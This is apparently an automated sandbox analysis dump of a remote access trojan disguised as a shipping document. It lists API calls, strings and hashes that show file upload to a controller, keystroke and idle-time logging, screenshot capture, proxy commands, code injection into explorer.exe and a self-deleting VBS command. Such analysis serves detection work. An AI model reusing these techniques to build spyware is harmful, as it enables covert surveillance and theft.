                                                      • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                      • API String ID: 2490988753-744132762
                                                      • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                      • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                      • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                      • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                      • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEnumOpen
                                                      • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                      • API String ID: 1332880857-3714951968
                                                      • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                      • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                      • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                      • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                      APIs
                                                      • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                      • GetCursorPos.USER32(?), ref: 0041CAF8
                                                      • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                      • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                      • ExitProcess.KERNEL32 ref: 0041CB74
                                                      • CreatePopupMenu.USER32 ref: 0041CB7A
                                                      • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                      • String ID: Close
                                                      • API String ID: 1657328048-3535843008
                                                      • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                      • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                      • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                      • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                      • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                      • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                      • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                      • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                      • __aulldiv.LIBCMT ref: 00407FE9
                                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                      • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                      • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                      • API String ID: 1884690901-3066803209
                                                      • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                      • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                      • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                      • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                      APIs
                                                      • Sleep.KERNEL32(00001388), ref: 00409E62
                                                        • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                        • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                        • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                        • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                      • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                      • API String ID: 3795512280-3163867910
                                                      • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                      • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                      • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                      • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                        • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                      • _free.LIBCMT ref: 004500A6
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 004500C8
                                                      • _free.LIBCMT ref: 004500DD
                                                      • _free.LIBCMT ref: 004500E8
                                                      • _free.LIBCMT ref: 0045010A
                                                      • _free.LIBCMT ref: 0045011D
                                                      • _free.LIBCMT ref: 0045012B
                                                      • _free.LIBCMT ref: 00450136
                                                      • _free.LIBCMT ref: 0045016E
                                                      • _free.LIBCMT ref: 00450175
                                                      • _free.LIBCMT ref: 00450192
                                                      • _free.LIBCMT ref: 004501AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                      • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                      • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                      • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 0041912D
                                                      • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                      • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                      • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                      • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                      • API String ID: 489098229-65789007
                                                      • Opcode ID: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                      • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                      • Opcode Fuzzy Hash: 91d1b4f4dea65f3b826fcaa200c07d0103cb4320fd1aa60c718ca5279f5f8068
                                                      • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                      APIs
                                                      • connect.WS2_32(?,?,?), ref: 004042A5
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                      • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                      • API String ID: 994465650-2151626615
                                                      APIs
                                                        • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                        • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                      • ExitProcess.KERNEL32 ref: 0040C832
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                      • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                      • API String ID: 1913171305-390638927
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                      • closesocket.WS2_32(?), ref: 0040481F
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                      • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                      • String ID:
                                                      • API String ID: 3658366068-0
                                                      APIs
                                                        • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                      • GetLastError.KERNEL32 ref: 00454A96
                                                      • __dosmaperr.LIBCMT ref: 00454A9D
                                                      • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                      • GetLastError.KERNEL32 ref: 00454AB3
                                                      • __dosmaperr.LIBCMT ref: 00454ABC
                                                      • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                      • CloseHandle.KERNEL32(?), ref: 00454C26
                                                      • GetLastError.KERNEL32 ref: 00454C58
                                                      • __dosmaperr.LIBCMT ref: 00454C5F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0040A456
                                                      • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                      • GetForegroundWindow.USER32 ref: 0040A467
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                      • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                        • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                      • String ID: [${ User has been idle for $ minutes }$]
                                                      • API String ID: 911427763-3954389425
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 65535$udp
                                                      • API String ID: 0-1267037602
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                      • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                      • __dosmaperr.LIBCMT ref: 004393CD
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                      • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                      • __dosmaperr.LIBCMT ref: 0043940A
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                      • __dosmaperr.LIBCMT ref: 0043945E
                                                      • _free.LIBCMT ref: 0043946A
                                                      • _free.LIBCMT ref: 00439471
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                      • String ID:
                                                      • API String ID: 2441525078-0
                                                      APIs
                                                      • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                      • TranslateMessage.USER32(?), ref: 00404F30
                                                      • DispatchMessageA.USER32(?), ref: 00404F3B
                                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                                      • API String ID: 2956720200-749203953
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                      • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                      • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                      • String ID: <$@$@FG$@FG$Temp
                                                      • API String ID: 1107811701-2245803885
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                      • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe), ref: 00406705
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: CurrentProcess
                                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                      • API String ID: 2050909247-4145329354
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                      • String ID:
                                                      • API String ID: 221034970-0
                                                      APIs
                                                      • _free.LIBCMT ref: 00446DDF
                                                        • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                        • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                      • _free.LIBCMT ref: 00446DEB
                                                      • _free.LIBCMT ref: 00446DF6
                                                      • _free.LIBCMT ref: 00446E01
                                                      • _free.LIBCMT ref: 00446E0C
                                                      • _free.LIBCMT ref: 00446E17
                                                      • _free.LIBCMT ref: 00446E22
                                                      • _free.LIBCMT ref: 00446E2D
                                                      • _free.LIBCMT ref: 00446E38
                                                      • _free.LIBCMT ref: 00446E46
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID: Eventinet_ntoa
                                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                      • API String ID: 3578746661-4192532303
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3064271455
                                                      • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                      • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                      • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
